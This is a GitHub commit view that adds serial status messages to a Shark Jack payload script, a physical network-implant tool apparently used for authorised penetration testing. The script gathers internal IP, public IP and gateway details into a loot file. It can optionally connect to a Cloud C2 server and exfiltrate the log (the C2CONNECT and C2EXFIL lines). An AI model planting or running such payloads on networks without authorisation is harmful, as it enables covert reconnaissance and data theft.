Update payload.sh

Updated with SERIAL_WRITE for Shark Jack Cable
pull/55/head
Darren Kitchen 2022-04-20 11:52:09 -05:00 committed by GitHub
parent 27eb6353e4
commit afecd52d27
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 3 deletions

View File

@ -14,11 +14,12 @@
# LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2
# LED FINISH (Green Fast Blink to Solid)... Payload successful
SERIAL_WRITE [*] Setting up payload
CLOUDC2=0
LOOT_DIR=/root/loot/ipinfo
PUBLIC_IP_URL="http://ipinfo.io/ip"
function FAIL() { LED FAIL; exit; }
function FAIL() { LED FAIL; SERIAL_WRITE [!] Failed to obtain IP address;exit; }
LED SETUP
# Make log file
@ -30,7 +31,7 @@ LOG="$LOOT_DIR/$LOG_FILE"
NETMODE DHCP_CLIENT
# Wait until Shark Jack has an IP address
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done
while ! ifconfig eth0 | grep "inet addr"; do sleep 1; SERIAL_WRITE ...waiting for IP address; done
LED ATTACK
# Gather IP info and save log
@ -42,12 +43,17 @@ Internal IP Address: $INTERNALIP\n\
Public IP Address: $PUBLICIP\n\
Gateway: $GATEWAY\n" >> $LOG
SERIAL_WRITE [*] Internal IP: $INTERNALIP
SERIAL_WRITE [*] Public IP: $PUBLICIP
SERIAL_WRITE [*] Gateway: $GATEWAY
# Optionally connect to Cloud C2, wait for connection and exfiltrate loot
if [ "$CLOUDC2" = "1" ]; then
SERIAL_WRITE [*] Sending results to Cloud C2
LED SPECIAL
C2CONNECT
while ! pgrep cc-client; do sleep 1; done
C2EXFIL STRING $LOG IPinfo
fi
LED FINISH
LED FINISH